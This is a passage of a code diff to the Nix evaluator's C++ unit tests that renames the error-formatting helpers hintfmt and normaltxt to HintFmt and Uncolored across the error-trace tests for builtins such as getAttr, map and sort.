evaluating the argument passed to builtins.attrNames")); } @@ -420,8 +421,8 @@ namespace nix { TEST_F(ErrorTraceTest, attrValues) { ASSERT_TRACE2("attrValues []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the argument passed to builtins.attrValues")); + HintFmt("expected a set but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the argument passed to builtins.attrValues")); } @@ -429,18 +430,18 @@ namespace nix { TEST_F(ErrorTraceTest, getAttr) { ASSERT_TRACE2("getAttr [] []", TypeError, - hintfmt("expected a string but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the first argument passed to builtins.getAttr")); + HintFmt("expected a string but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the first argument passed to builtins.getAttr")); ASSERT_TRACE2("getAttr \"foo\" []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the second argument passed to builtins.getAttr")); + HintFmt("expected a set but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the second argument passed to builtins.getAttr")); ASSERT_TRACE2("getAttr \"foo\" {}", TypeError, - hintfmt("attribute '%s' missing", "foo"), - hintfmt("in the attribute set under consideration")); + HintFmt("attribute '%s' missing", "foo"), + HintFmt("in the attribute set under consideration")); } @@ -452,13 +453,13 @@ namespace nix { TEST_F(ErrorTraceTest, hasAttr) { ASSERT_TRACE2("hasAttr [] []", TypeError, - hintfmt("expected a string but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the first argument passed to builtins.hasAttr")); + HintFmt("expected a string but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the first argument passed to builtins.hasAttr")); ASSERT_TRACE2("hasAttr \"foo\" []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the second argument passed to builtins.hasAttr")); + HintFmt("expected a set but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the second argument passed to builtins.hasAttr")); } @@ -470,18 +471,18 @@ namespace nix { TEST_F(ErrorTraceTest, removeAttrs) { ASSERT_TRACE2("removeAttrs \"\" \"\"", TypeError, - hintfmt("expected a set but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.removeAttrs")); + HintFmt("expected a set but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.removeAttrs")); ASSERT_TRACE2("removeAttrs \"\" [ 1 ]", TypeError, - hintfmt("expected a set but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.removeAttrs")); + HintFmt("expected a set but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.removeAttrs")); ASSERT_TRACE2("removeAttrs \"\" [ \"1\" ]", TypeError, - hintfmt("expected a set but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.removeAttrs")); + HintFmt("expected a set but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.removeAttrs")); } @@ -489,28 +490,28 @@ namespace nix { TEST_F(ErrorTraceTest, listToAttrs) { ASSERT_TRACE2("listToAttrs 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the argument passed to builtins.listToAttrs")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the argument passed to builtins.listToAttrs")); ASSERT_TRACE2("listToAttrs [ 1 ]", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating an element of the list passed to builtins.listToAttrs")); + HintFmt("expected a set but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating an element of the list passed to builtins.listToAttrs")); ASSERT_TRACE2("listToAttrs [ {} ]", TypeError, - hintfmt("attribute '%s' missing", "name"), - hintfmt("in a {name=...; value=...;} pair")); + HintFmt("attribute '%s' missing", "name"), + HintFmt("in a {name=...; value=...;} pair")); ASSERT_TRACE2("listToAttrs [ { name = 1; } ]", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the `name` attribute of an element of the list passed to builtins.listToAttrs")); + HintFmt("expected a string but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the `name` attribute of an element of the list passed to builtins.listToAttrs")); ASSERT_TRACE2("listToAttrs [ { name = \"foo\"; } ]", TypeError, - hintfmt("attribute '%s' missing", "value"), - hintfmt("in a {name=...; value=...;} pair")); + HintFmt("attribute '%s' missing", "value"), + HintFmt("in a {name=...; value=...;} pair")); } @@ -518,13 +519,13 @@ namespace nix { TEST_F(ErrorTraceTest, intersectAttrs) { ASSERT_TRACE2("intersectAttrs [] []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the first argument passed to builtins.intersectAttrs")); + HintFmt("expected a set but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the first argument passed to builtins.intersectAttrs")); ASSERT_TRACE2("intersectAttrs {} []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the second argument passed to builtins.intersectAttrs")); + HintFmt("expected a set but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the second argument passed to builtins.intersectAttrs")); } @@ -532,23 +533,23 @@ namespace nix { TEST_F(ErrorTraceTest, catAttrs) { ASSERT_TRACE2("catAttrs [] {}", TypeError, - hintfmt("expected a string but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the first argument passed to builtins.catAttrs")); + HintFmt("expected a string but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the first argument passed to builtins.catAttrs")); ASSERT_TRACE2("catAttrs \"foo\" {}", TypeError, - hintfmt("expected a list but found %s: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the second argument passed to builtins.catAttrs")); + HintFmt("expected a list but found %s: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the second argument passed to builtins.catAttrs")); ASSERT_TRACE2("catAttrs \"foo\" [ 1 ]", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating an element in the list passed as second argument to builtins.catAttrs")); + HintFmt("expected a set but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating an element in the list passed as second argument to builtins.catAttrs")); ASSERT_TRACE2("catAttrs \"foo\" [ { foo = 1; } 1 { bar = 5;} ]", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating an element in the list passed as second argument to builtins.catAttrs")); + HintFmt("expected a set but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating an element in the list passed as second argument to builtins.catAttrs")); } @@ -556,7 +557,7 @@ namespace nix { TEST_F(ErrorTraceTest, functionArgs) { ASSERT_TRACE1("functionArgs {}", TypeError, - hintfmt("'functionArgs' requires a function")); + HintFmt("'functionArgs' requires a function")); } @@ -564,24 +565,24 @@ namespace nix { TEST_F(ErrorTraceTest, mapAttrs) { ASSERT_TRACE2("mapAttrs [] []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the second argument passed to builtins.mapAttrs")); + HintFmt("expected a set but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the second argument passed to builtins.mapAttrs")); // XXX: defered // ASSERT_TRACE2("mapAttrs \"\" { foo.bar = 1; }", // TypeError, - // hintfmt("attempt to call something which is not a function but %s", "a string"), - // hintfmt("while evaluating the attribute 'foo'")); + // HintFmt("attempt to call something which is not a function but %s", "a string"), + // HintFmt("while evaluating the attribute 'foo'")); // ASSERT_TRACE2("mapAttrs (x: x + \"1\") { foo.bar = 1; }", // TypeError, - // hintfmt("attempt to call something which is not a function but %s", "a string"), - // hintfmt("while evaluating the attribute 'foo'")); + // HintFmt("attempt to call something which is not a function but %s", "a string"), + // HintFmt("while evaluating the attribute 'foo'")); // ASSERT_TRACE2("mapAttrs (x: y: x + 1) { foo.bar = 1; }", // TypeError, - // hintfmt("cannot coerce %s to a string", "an integer"), - // hintfmt("while evaluating a path segment")); + // HintFmt("cannot coerce %s to a string", "an integer"), + // HintFmt("while evaluating a path segment")); } @@ -589,27 +590,27 @@ namespace nix { TEST_F(ErrorTraceTest, zipAttrsWith) { ASSERT_TRACE2("zipAttrsWith [] [ 1 ]", TypeError, - hintfmt("expected a function but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the first argument passed to builtins.zipAttrsWith")); + HintFmt("expected a function but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the first argument passed to builtins.zipAttrsWith")); ASSERT_TRACE2("zipAttrsWith (_: 1) [ 1 ]", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating a value of the list passed as second argument to builtins.zipAttrsWith")); + HintFmt("expected a set but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating a value of the list passed as second argument to builtins.zipAttrsWith")); // XXX: How to properly tell that the fucntion takes two arguments ? // The same question also applies to sort, and maybe others. // Due to lazyness, we only create a thunk, and it fails later on. // ASSERT_TRACE2("zipAttrsWith (_: 1) [ { foo = 1; } ]", // TypeError, - // hintfmt("attempt to call something which is not a function but %s", "an integer"), - // hintfmt("while evaluating the attribute 'foo'")); + // HintFmt("attempt to call something which is not a function but %s", "an integer"), + // HintFmt("while evaluating the attribute 'foo'")); // XXX: Also deferred deeply // ASSERT_TRACE2("zipAttrsWith (a: b: a + b) [ { foo = 1; } { foo = 2; } ]", // TypeError, - // hintfmt("cannot coerce %s to a string", "a list"), - // hintfmt("while evaluating a path segment")); + // HintFmt("cannot coerce %s to a string", "a list"), + // HintFmt("while evaluating a path segment")); } @@ -621,16 +622,16 @@ namespace nix { TEST_F(ErrorTraceTest, elemAt) { ASSERT_TRACE2("elemAt \"foo\" (-1)", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.elemAt")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.elemAt")); ASSERT_TRACE1("elemAt [] (-1)", Error, - hintfmt("list index %d is out of bounds", -1)); + HintFmt("list index %d is out of bounds", -1)); ASSERT_TRACE1("elemAt [\"foo\"] 3", Error, - hintfmt("list index %d is out of bounds", 3)); + HintFmt("list index %d is out of bounds", 3)); } @@ -638,12 +639,12 @@ namespace nix { TEST_F(ErrorTraceTest, head) { ASSERT_TRACE2("head 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.elemAt")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.elemAt")); ASSERT_TRACE1("head []", Error, - hintfmt("list index %d is out of bounds", 0)); + HintFmt("list index %d is out of bounds", 0)); } @@ -651,12 +652,12 @@ namespace nix { TEST_F(ErrorTraceTest, tail) { ASSERT_TRACE2("tail 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.tail")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.tail")); ASSERT_TRACE1("tail []", Error, - hintfmt("'tail' called on an empty list")); + HintFmt("'tail' called on an empty list")); } @@ -664,13 +665,13 @@ namespace nix { TEST_F(ErrorTraceTest, map) { ASSERT_TRACE2("map 1 \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.map")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.map")); ASSERT_TRACE2("map 1 [ 1 ]", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.map")); + HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.map")); } @@ -678,18 +679,18 @@ namespace nix { TEST_F(ErrorTraceTest, filter) { ASSERT_TRACE2("filter 1 \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.filter")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.filter")); ASSERT_TRACE2("filter 1 [ \"foo\" ]", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.filter")); + HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.filter")); ASSERT_TRACE2("filter (_: 5) [ \"foo\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "5" ANSI_NORMAL)), - hintfmt("while evaluating the return value of the filtering function passed to builtins.filter")); + HintFmt("expected a Boolean but found %s: %s", "an integer", Uncolored(ANSI_CYAN "5" ANSI_NORMAL)), + HintFmt("while evaluating the return value of the filtering function passed to builtins.filter")); } @@ -697,8 +698,8 @@ namespace nix { TEST_F(ErrorTraceTest, elem) { ASSERT_TRACE2("elem 1 \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.elem")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.elem")); } @@ -706,18 +707,18 @@ namespace nix { TEST_F(ErrorTraceTest, concatLists) { ASSERT_TRACE2("concatLists 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.concatLists")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.concatLists")); ASSERT_TRACE2("concatLists [ 1 ]", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating a value of the list passed to builtins.concatLists")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating a value of the list passed to builtins.concatLists")); ASSERT_TRACE2("concatLists [ [1] \"foo\" ]", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating a value of the list passed to builtins.concatLists")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating a value of the list passed to builtins.concatLists")); } @@ -725,13 +726,13 @@ namespace nix { TEST_F(ErrorTraceTest, length) { ASSERT_TRACE2("length 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.length")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.length")); ASSERT_TRACE2("length \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.length")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.length")); } @@ -739,22 +740,22 @@ namespace nix { TEST_F(ErrorTraceTest, foldlPrime) { ASSERT_TRACE2("foldl' 1 \"foo\" true", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.foldlStrict")); + HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.foldlStrict")); ASSERT_TRACE2("foldl' (_: 1) \"foo\" true", TypeError, - hintfmt("expected a list but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), - hintfmt("while evaluating the third argument passed to builtins.foldlStrict")); + HintFmt("expected a list but found %s: %s", "a Boolean", Uncolored(ANSI_CYAN "true" ANSI_NORMAL)), + HintFmt("while evaluating the third argument passed to builtins.foldlStrict")); ASSERT_TRACE1("foldl' (_: 1) \"foo\" [ true ]", TypeError, - hintfmt("attempt to call something which is not a function but %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL))); + HintFmt("attempt to call something which is not a function but %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL))); ASSERT_TRACE2("foldl' (a: b: a && b) \"foo\" [ true ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("in the left operand of the AND (&&) operator")); + HintFmt("expected a Boolean but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("in the left operand of the AND (&&) operator")); } @@ -762,18 +763,18 @@ namespace nix { TEST_F(ErrorTraceTest, any) { ASSERT_TRACE2("any 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.any")); + HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.any")); ASSERT_TRACE2("any (_: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.any")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.any")); ASSERT_TRACE2("any (_: 1) [ \"foo\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the return value of the function passed to builtins.any")); + HintFmt("expected a Boolean but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the return value of the function passed to builtins.any")); } @@ -781,18 +782,18 @@ namespace nix { TEST_F(ErrorTraceTest, all) { ASSERT_TRACE2("all 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.all")); + HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.all")); ASSERT_TRACE2("all (_: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.all")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.all")); ASSERT_TRACE2("all (_: 1) [ \"foo\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the return value of the function passed to builtins.all")); + HintFmt("expected a Boolean but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the return value of the function passed to builtins.all")); } @@ -800,23 +801,23 @@ namespace nix { TEST_F(ErrorTraceTest, genList) { ASSERT_TRACE2("genList 1 \"foo\"", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.genList")); + HintFmt("expected an integer but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.genList")); ASSERT_TRACE2("genList 1 2", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.genList", "an integer")); + HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.genList", "an integer")); // XXX: defered // ASSERT_TRACE2("genList (x: x + \"foo\") 2 #TODO", // TypeError, - // hintfmt("cannot add %s to an integer", "a string"), - // hintfmt("while evaluating anonymous lambda")); + // HintFmt("cannot add %s to an integer", "a string"), + // HintFmt("while evaluating anonymous lambda")); ASSERT_TRACE1("genList false (-3)", EvalError, - hintfmt("cannot create list of size %d", -3)); + HintFmt("cannot create list of size %d", -3)); } @@ -824,31 +825,31 @@ namespace nix { TEST_F(ErrorTraceTest, sort) { ASSERT_TRACE2("sort 1 \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.sort")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.sort")); ASSERT_TRACE2("sort 1 [ \"foo\" ]", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.sort")); + HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.sort")); ASSERT_TRACE1("sort (_: 1) [ \"foo\" \"bar\" ]", TypeError, - hintfmt("attempt to call something which is not a function but %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL))); + HintFmt("attempt to call something which is not a function but %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL))); ASSERT_TRACE2("sort (_: _: 1) [ \"foo\" \"bar\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the return value of the sorting function passed to builtins.sort")); + HintFmt("expected a Boolean but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the return value of the sorting function passed to builtins.sort")); // XXX: Trace too deep, need better asserts // ASSERT_TRACE1("sort (a: b: a <= b) [ \"foo\" {} ] # TODO", // TypeError, - // hintfmt("cannot compare %s with %s", "a string", "a set")); + // HintFmt("cannot compare %s with %s", "a string", "a set")); // ASSERT_TRACE1("sort (a: b: a <= b) [ {} {} ] # TODO", // TypeError, - // hintfmt("cannot compare %s with %s; values of that type are incomparable", "a set", "a set")); + // HintFmt("cannot compare %s with %s; values of that type are incomparable", "a set", "a set")); } @@ -856,18 +857,18 @@ namespace nix { TEST_F(ErrorTraceTest, partition) { ASSERT_TRACE2("partition 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.partition")); + HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.partition")); ASSERT_TRACE2("partition (_: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.partition")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.partition")); ASSERT_TRACE2("partition (_: 1) [ \"foo\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the return value of the partition function passed to builtins.partition")); + HintFmt("expected a Boolean but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the return value of the partition function passed to builtins.partition")); } @@ -875,18 +876,18 @@ namespace nix { TEST_F(ErrorTraceTest, groupBy) { ASSERT_TRACE2("groupBy 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.groupBy")); + HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.groupBy")); ASSERT_TRACE2("groupBy (_: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.groupBy")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.groupBy")); ASSERT_TRACE2("groupBy (x: x) [ \"foo\" \"bar\" 1 ]", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the return value of the grouping function passed to builtins.groupBy")); + HintFmt("expected a string but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the return value of the grouping function passed to builtins.groupBy")); } @@ -894,23 +895,23 @@ namespace nix { TEST_F(ErrorTraceTest, concatMap) { ASSERT_TRACE2("concatMap 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.concatMap")); + HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.concatMap")); ASSERT_TRACE2("concatMap (x: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.concatMap")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.concatMap")); ASSERT_TRACE2("concatMap (x: 1) [ \"foo\" ] # TODO", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the return value of the function passed to builtins.concatMap")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the return value of the function passed to builtins.concatMap")); ASSERT_TRACE2("concatMap (x: \"foo\") [ 1 2 ] # TODO", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the return value of the function passed to builtins.concatMap")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the return value of the function passed to builtins.concatMap")); } @@ -918,13 +919,13 @@ namespace nix { TEST_F(ErrorTraceTest, add) { ASSERT_TRACE2("add \"foo\" 1", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument of the addition")); + HintFmt("expected an integer but found %s: %s", "a string", 